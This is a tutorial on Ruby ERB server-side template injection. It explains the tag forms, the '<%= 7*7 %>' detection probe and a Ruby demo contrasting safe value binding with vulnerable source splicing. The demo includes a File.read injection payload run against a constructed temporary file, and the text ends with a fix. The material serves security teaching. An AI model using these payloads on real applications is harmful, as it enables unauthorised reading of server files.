Understanding Ruby ERB template injection, and detecting Ruby ERB template injection.
ERB is the templating engine bundled with Ruby's standard library. It has two tag forms:
- <% ... %> runs Ruby code (control flow, assignments) without writing anything to the output
- <%= ... %> evaluates a Ruby expression and writes the result (a variable's value, an arithmetic result, any return value) into the output
require 'erb'
# The template is compiled once; the value of x is looked up at render time
# through the binding passed to result, so the same ERB object can be reused.
template = "text to be generated: <%= x %>"
erb_object = ERB.new(template)
x = 5
puts erb_object.result(binding)   # text to be generated: 5
x = 4
puts erb_object.result(binding)   # text to be generated: 4
# Detecting Ruby ERB template injection
The injection point is the template source, not the variable: a value bound to x is only printed, whereas anything concatenated into the string handed to ERB.new is compiled as Ruby. When that source is attacker-controlled, ERB behaves like any other server-side template engine, and the standard probe is to inject <%= 7*7 %> and check whether 49 shows up in the response in place of the literal expression.
require 'erb'
# Attacker-controlled string spliced into the template source (the
# vulnerable pattern): ERB compiles the tag and Ruby evaluates 7*7.
user_input = "<%= 7*7 %>"
template = "text to be generated: #{user_input}"
erb_object = ERB.new(template)
puts erb_object.result(binding)   # text to be generated: 49
Reading a file:
require 'erb'
template = "text to be generated: <%= x %>"
# The original listing breaks off here, before the file-reading payload.
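The following is an added, self-contained example (not code from the original page) that puts the detection probe and the file-read step side by side against both rendering patterns: one where untrusted input is only a value bound to x, and one where it is spliced into the template source. The function names, the File.read payload and the temporary file with constructed contents are assumptions made for this example; the page itself cuts off before showing its file-read payload.

```ruby
require 'erb'
require 'tempfile'

# Safe pattern: untrusted input is only a VALUE bound to a local variable.
# ERB compiles the fixed template and never re-parses the rendered value,
# so a probe such as "<%= 7*7 %>" is echoed back literally.
def render_value(user_input)
  template = "text to be generated: <%= x %>"
  x = user_input
  ERB.new(template).result(binding)
end

# Vulnerable pattern: untrusted input is spliced into the template SOURCE
# before ERB.new sees it, so whatever the user wrote becomes Ruby code.
def render_source(user_input)
  template = "text to be generated: #{user_input}"
  ERB.new(template).result(binding)
end

# Detection probe: inject an arithmetic expression and look for its result.
# `render` is any callable that takes the user string and returns the page.
# Injection is confirmed only if 49 appears AND the literal 7*7 is gone.
def injectable?(render)
  out = render.call("<%= 7*7 %>")
  out.include?("49") && !out.include?("7*7")
end

# Post-exploitation step from the page: read a file through the same sink.
# File.read is plain Ruby, which is exactly what the <%= %> tag executes.
# (Assumed payload; the original listing breaks off before showing one.)
def read_file_via_erb(render, path)
  render.call("<%= File.read(#{path.inspect}) %>")
end

# Demo against a temporary file created here with constructed contents
# (not a real target), so the whole thing runs offline.
def demo_file_read(render)
  Tempfile.create("erb-demo") do |f|
    f.write("constructed-secret")
    f.flush
    read_file_via_erb(render, f.path)
  end
end

if __FILE__ == $PROGRAM_NAME
  { render_value: method(:render_value),
    render_source: method(:render_source) }.each do |name, r|
    puts "#{name}: injectable=#{injectable?(r)} file=#{demo_file_read(r).inspect}"
  end
end
```

Running it shows render_value echoing the probe and the File.read tag back as text, while render_source returns 49 and then the file contents. The fix is therefore not to escape the probe string but to stop building template source from request data: keep templates static and pass untrusted values through the binding, as render_value does.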